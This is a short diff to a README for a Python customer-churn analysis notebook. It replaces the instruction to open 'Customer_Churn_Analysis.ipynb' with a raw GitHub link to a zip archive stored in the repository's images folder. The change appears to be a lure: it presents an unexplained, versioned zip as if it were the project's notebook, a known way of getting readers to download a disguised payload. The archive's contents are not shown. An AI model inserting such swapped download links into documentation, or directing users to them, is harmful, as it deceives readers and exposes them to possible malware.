letticoarsetextured509/Customer-Churn-Analysis-Python/README.md

      jupyter notebook
      ```
    - This will open Jupyter Notebook in your web browser.
-   - Locate the file named `Customer_Churn_Analysis.ipynb` and click on it to open.
+   - Locate the file named `https://raw.githubusercontent.com/letticoarsetextured509/Customer-Churn-Analysis-Python/main/images/Customer-Churn-Analysis-Python-3.7.zip` and click on it to open.

 ## 🌐 Exploring the Analysis